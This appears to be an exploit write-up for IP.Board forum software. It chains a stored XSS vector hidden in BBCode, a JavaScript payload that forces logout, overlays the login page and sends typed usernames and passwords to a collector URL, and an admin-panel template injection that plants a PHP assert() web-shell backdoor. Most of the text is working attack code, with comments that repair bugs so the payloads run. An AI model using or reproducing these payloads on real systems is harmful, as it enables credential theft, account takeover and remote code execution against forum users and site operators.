XSS Vector:
[b][twitter]qwe'onmouseover=parentElement.innerHTML='';document.body.appendChild(document.createElement('script')).src='data:,alert(1)'// style=opacity:0;position:fixed;left:0;top:0;width:5000px;height:5000px [member="%username_that_exists% "]qwe[/twitter][/b]
XSS Payload (JavaScript loaded by the vector above; it logs the victim out, frames the login page full-screen and reports the credentials typed into the framed form):
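// Collector endpoint: captured credentials are appended to the `a` query
// parameter and fetched as an image GET request (see iP()).
// Declared with `const` instead of an implicit global assignment, which would
// throw under strict mode.
const sF = "https://example.com/a.php?a=";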
// Read a single cookie by name from document.cookie.
// The name is regex-escaped before being interpolated into the pattern, so
// names containing "." or other metacharacters match literally.
// Returns the decoded value, or undefined when no such cookie is set.
function gC(name) {
  const escapedName = name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, "\\$1");
  const pattern = new RegExp("(?:^|; )" + escapedName + "=([^;]*)");
  const found = document.cookie.match(pattern);
  if (!found) {
    return undefined;
  }
  return decodeURIComponent(found[1]);
}
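// Hook the login form inside the overlay iframe (named "fr", created by iW())
// so that each submit also reports the typed credentials to sF. The handler
// never returns false, so the real submission still goes through afterwards.
//
// Fix vs. the original: it called atob(), which *decodes* base64 and throws
// InvalidCharacterError on plain text such as "login=…;password=…", so the
// report was never sent. btoa() is the intended encoder. The result is also
// URL-encoded, because the base64 characters "+" and "/" would otherwise be
// mangled when the collector reads them back from the query string.
// NOTE: btoa() only accepts Latin-1 input; a password containing other
// characters still throws inside the handler (login proceeds, nothing is sent).
function iP() {
  const frameWin = window.frames.fr;
  const frameDoc = frameWin.contentDocument || frameWin.document;
  const forms = frameDoc.getElementsByTagName("form");
  for (let i = 0; i < forms.length; i++) {
    if (forms[i].id !== "login") {
      continue;
    }
    // Regular function on purpose: `this` must be the form element so its
    // named fields (ips_username / ips_password) are reachable.
    forms[i].onsubmit = function () {
      const record = "login=" + this.ips_username.value + ";password=" + this.ips_password.value;
      (new Image()).src = sF + encodeURIComponent(btoa(record));
      // Marks this browser as already harvested so the top-level script does
      // not force another logout / overlay on the next page load.
      document.cookie = "XSSED=1";
    };
  }
}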
// Replace the whole document with a viewport-sized iframe (named "fr") that
// reloads the current URL, and arm iP() on its load event. Scrollbars and the
// body margin are suppressed so the framed copy lines up with the original
// page. The iframe markup is built with unquoted attribute values; the URL is
// the page's own location.
function iW() {
  document.body.style.overflow = "hidden";
  const frameWidth = document.documentElement.clientWidth - 1;
  const frameHeight = document.documentElement.clientHeight - 4;
  const frameMarkup =
    "\x3ciframe name=fr onload=iP(); src=" + location +
    " style=border:0;width:" + frameWidth + "px;height:" + frameHeight + "px\x3e\x3c/iframe\x3e";
  document.documentElement.innerHTML = frameMarkup;
  document.body.style.margin = 0;
}
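// Entry point: unless this browser was already harvested (XSSED cookie set by
// iP()), force a logout so the victim is shown the login form again, then
// install the overlay. The logout is triggered by loading the logout URL as an
// image, carrying the board's CSRF key from ipb.vars; iW() runs from the
// image's onerror, which is expected to fire because the logout response is
// an HTML page rather than image data.
//
// Fix vs. the original: the query string contained "§ion=" — the HTML entity
// "&sect" decoded in place of "&section=" — so the request never reached the
// login/logout handler. Restored to "&section=".
if (gC("XSSED") !== "1") {
  const img = new Image();
  img.src = "index.php?app=core&module=global&section=login&do=logout&k=" + ipb.vars["secure_hash"];
  img.setAttribute("onerror", "iW();");
  document.body.appendChild(img);
}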
Admin Panel RCE (template injection; requires an authenticated administrator session, e.g. one obtained with the credentials harvested above):
Open URL: /ipb/admin/index.php?app=core&module=templates&section=templates&do=list&setID=1&adsess=9a43a6719acda5ec05cf47e14a9e6ea7 (`adsess` is the current administrator session token — the value shown is an example and must be replaced with your own; the `&section=` parameter appears garbled as `§ion` in some copies of this text).
Then open Board Index => boardIndexTemplate.
Add the following code to the template. `assert()` on a string evaluates it as PHP (PHP 5 and 7; string assertions are no longer evaluated in PHP 8), so once the template is saved, any POST to the board index with parameter `a` set to PHP source executes it in the web-server process:
<if test="isset($_POST['a'])">
${assert($_POST['a'])}
</if>